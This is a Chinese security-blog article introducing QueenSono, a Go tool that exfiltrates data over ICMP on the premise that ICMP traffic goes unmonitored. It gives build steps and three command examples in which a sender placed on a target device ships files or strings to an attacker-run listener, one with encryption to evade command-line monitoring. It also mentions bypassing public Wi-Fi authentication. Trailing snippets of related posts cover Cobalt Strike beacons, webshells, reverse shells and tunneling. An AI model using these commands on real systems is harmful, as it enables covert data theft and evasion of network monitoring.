如何使用QueenSono从ICMP提取数据

VSole2021-10-20 16:52:33

关于QueenSono

QueenSono是一款针对ICMP协议的数据提取工具,该工具基于Golang开发,并且只依赖于ICMP协议不受监控这一事实实现其功能。除此之外,该工具也可以用于基本的ICMP检查,或绕过某些身份验证机制,比如说许多公共Wi-Fi在连接到Wi-Fi(如机场Wi-Fi)后用于对用户进行身份验证。

工具安装

从源码安装

广大研究人员可以直接使用下列命令将该项目源码克隆至本地,并安装好该工具所需的依赖组件:

git clone https://github.com/ariary/QueenSono.gitmake before.build

下列命令可以构建ICMP包发送器-qssender:

build.queensono-sender

下列命令可以构建ICMP包接收器-qsreceiver:

build.queensono-receiver

工具使用

ICMP包发送器-qssender将负责把ICMP数据包发送至监听器,因此我们需要将qssender源码传输到目标设备上。

ICMP包接收器-qsreceiver就是我们本地设备上的数据包监听器了。

所有的命令和工具参数都可以使用“—help”来查看。

工具使用样例1:发送包携带“ACK”

在这个例子中,我们将发送一个大型文件,并查看接收到数据包之后的回复信息:

在本地设备上,运行下列命令:

$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt

参数解释:

-l 0.0.0.0:监听所有接口的ICMP数据包
-f received_bible.txt:将接收到的数据存储至文件
-p:显示接收数据的进度条

在目标设备上,运行下列命令:

$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt

参数解释:

send file:发送文件
-d 2:每两秒发送一个数据包
-l 127.0.0.1:每次接收回复信息的监听地址
-r 10.0.0.92:运行了qsreceiver 监听器的远程设备地址
-s 50000:每个数据包需要发送的数据量大小

工具使用样例2:发送包不携带“ACK”

在这个例子中,我们希望在不等待回复信息的情况下发送数据:

在本地设备上,运行下列命令:

$ qsreceiver receive truncated 1 -l 0.0.0.0

参数解释:

receive truncated 1:如果没有收到所有数据包,则不会无限期等待


在目标设备上,运行下列命令:

$ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 -s 1 -N

参数解释:

-N:无回复选项

工具使用样例3:发送加密数据

在这个例子中,我们将发送加密消息。由于命令行可能会被监控,因此我们将使用非对称加密(防止密钥泄露):

在本地设备上,运行下列命令:

$ qsreceiver receive -l 0.0.0.0 --encrypt<OUTPUT PUBLIC KEY>

参数解释:

—encrypt:使用加密交换,它将生成公钥/私钥。公钥将用于qssender加密数据,私钥将用于接收器解密数据


在目标设备上,运行下列命令:

$ export MSG="<your message>"$ export KEY="<public_key_from_qsreceiver_output>"$ qssender send $MSG -d 1 -l 127.0.0.1 -r 10.0.0.190 -s 5 --key $KEY

参数解释:

—key:提供数据加密的密钥

项目地址

QueenSono:【点击阅读原文】

参考资料

https://github.com/ariary/QueenSono/tree/main/hack

icmp监听器
本作品采用《CC 协议》,转载必须注明作者和本文链接
关于QueenSonoQueenSono是一款针对ICMP协议的数据提取工具,该工具基于Golang开发,并且只依赖于ICMP协议不受监控这一事实实现其功能。除此之外,该工具也可以用于基本的ICMP检查,或绕过某些身份验证机制,比如说许多公共Wi-Fi在连接到Wi-Fi后用于对用户进行身份验证。工具安装从源码安装广大研究人员可以直接使用下列命令将该项目源码克隆至本地
突破安全策略上线CS
2021-10-29 08:09:17
0x01 环境简述&说明web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 2016,目标不出网!0x02 为什么要上线cswebshell权限太低,限制性大,需要上线cs提权,因为cs是采用反射dll来加载pe程序,从而在执行一些敏感操作的时候能起到一定的bypass作用,例如mimikatz抓密码等操作。
#默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true. #这里是当前获得的session的id. 可以看到 cs 成功接收到 shell右键 Interact 调出 beacon 界面,net view 查看当前域中计算机列表,然后执行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig四、制作木马首先创建监听器用于木马回连,Host 为 cs 服务端的 ipAttacks->Packages->Windows Executable?需要派生的目标右击选择Spawn,然后创建一个?
因为 web 服务器同时连接了外网和内网,所以必须首先拿下。这里有关 web 服务器的渗透不展开讲了,无非也就是利用漏洞,诸如:弱口令、上传漏洞、远程代码执行、各种 cms 漏洞,总之都是可以找到写入 webshell 的方法。成功写入 webshell 后,接着就要上传木马控制 web 服务器,这里可以用 Metasploit或 Cobaltstrike。
隧道与端口转发
2021-11-18 08:26:13
如果想获得课程报名资格,请添加文末小助手微信咨询。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站协议。情况1:目标禁止出站ip如果目标主机设置了严格的策略,防火墙只允许目标内网机器主动连接公网指定的ip。这样的话,没法反弹shell。情况2:禁止出站端口Linux系统使用Linux系统自带命令探测出网端口。
蓝队初级防护总结
2023-01-09 10:11:55
三. 网站被上传webshell如何处理?工具方面比如使用D盾webshellkill,河马webshell查杀,百度在线webshell查杀等工具对网站目录进行排查查杀,如果是在护网期间可以将样本备份再进行查杀。堡垒机是针对内部运维人员的运维安全审计系统。WAFWAF是以网站或应用系统为核心的安全产品,通过对HTTP或HTTPS的Web攻击行为进行分析并拦截,有效的降低网站安全风险。
堡垒机是针对内部运维人员的运维安全审计系统。WAFWAF是以网站或应用系统为核心的安全产品,通过对HTTP或HTTPS的Web攻击行为进行分析并拦截,有效的降低网站安全风险。设置账户锁定策略,比如说登录行为限制次数,达到次数后锁定多长时间。
Windows如果RDP连接上去,可以使用图形化工具(如御剑)。如果是webshell,可以使用fscan、nmap。重命名Dir,方便后续操作。将客户端配置删除?服务端监听地址?服务端仪表板的端口。log_level记录的日志级别。执行命令等待frpc连接./frps?#是该条规则在服务端开放的端口号,待会儿用proxyfier连的端口
2020年3月5日,美国兰德公司发布报告《如何分析无人机构成的网络威胁》,研究无人机快速增长对网络安全造成的影响,然后为国土安全部应对这一威胁做出分析并提出建议。 报告探索了无人机快速增长对网络安全影响的方法以及建模,特别关注当前的漏洞和未来的发展趋势。报告提出了一些概念性方法,旨在对与无人机相关的网络威胁进行列举和分类,并探索对商业无人机威胁进行建模的潜在益处和挑战。
本文为内测第一周结束后内网学员的学习笔记,后续本公众号会持续更新其他课程学员学习笔记。对课程感兴趣,请添加文末小助手微信咨询。0x01 MSF安装和升级 最近mac本机和linux服务器上的msf在执行msfupdate命令以后都出现了不同程度的玄学问题,于是卸了重装。
VSole
网络安全专家